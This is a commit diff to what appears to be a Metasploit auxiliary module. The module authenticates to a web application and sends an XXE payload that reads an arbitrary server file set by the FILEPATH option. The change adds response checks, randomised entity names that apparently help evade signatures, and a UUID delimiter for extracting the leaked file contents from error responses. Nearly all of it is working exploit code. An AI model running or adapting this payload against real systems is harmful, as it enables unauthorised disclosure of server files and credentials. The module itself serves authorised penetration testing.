Added error checks, randomness, and uuid delimeter
This commit is contained in:
parent
f3fc4003d0
commit
0490af8ba8
|
@ -50,6 +50,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
def run
|
||||
|
||||
print_status("Logging in to grab a valid session cookie")
|
||||
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, 'j_spring_security_check'),
|
||||
|
@ -60,6 +61,12 @@ class Metasploit3 < Msf::Auxiliary
|
|||
},
|
||||
})
|
||||
|
||||
if res.nil?
|
||||
fail_with("No response from POST request")
|
||||
elsif res.code != 302
|
||||
fail_with("Non-302 response from POST request")
|
||||
end
|
||||
|
||||
unless res.headers["Location"].include? "index.jsp"
|
||||
fail_with(Failure::Unknown, 'Authentication failed')
|
||||
end
|
||||
|
@ -68,7 +75,16 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
print_status("Got cookie, going for the goods")
|
||||
|
||||
xxe = '<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file://'+datastore["FILEPATH"]+'" >]><foo>&xxe;</foo>'
|
||||
rand_doctype= Rex::Text.rand_text_alpha(rand(1..10))
|
||||
rand_entity1 = Rex::Text.rand_text_alpha(rand(1..10))
|
||||
rand_entity2 = Rex::Text.rand_text_alpha(rand(1..10))
|
||||
delimiter = SecureRandom.uuid
|
||||
|
||||
xxe = %Q^<?xml version="1.0" encoding="ISO-8859-1"?>
|
||||
<!DOCTYPE #{rand_doctype} [
|
||||
<!ELEMENT #{rand_entity1} ANY >
|
||||
<!ENTITY #{rand_entity2} SYSTEM "file://#{datastore["FILEPATH"]}" >
|
||||
]><#{rand_entity1}>#{delimiter}&#{rand_entity2};#{delimiter}</#{rand_entity1}>^
|
||||
|
||||
res = send_request_raw({
|
||||
'method' => 'POST',
|
||||
|
@ -77,15 +93,15 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'cookie' => cookie
|
||||
})
|
||||
|
||||
# extract filepath data from response and remove preceding errors
|
||||
# extract filepath data from response
|
||||
|
||||
if res.body =~ /<title.*\/?>(.+)<\/title\/?>/m
|
||||
title = $1
|
||||
if res and res.code == 400 and res.message =~ /#{delimiter}(.+)#{delimiter}/
|
||||
result = $1
|
||||
print_good("#{result}")
|
||||
else
|
||||
fail_with(Failure::Unknown, 'Error fetching file, try another')
|
||||
end
|
||||
|
||||
result = title.match(/"(.*)/m)
|
||||
|
||||
print_good("#{result}")
|
||||
|
||||
end
|
||||
end
|
||||
|
||||
|
|
Loading…
Reference in New Issue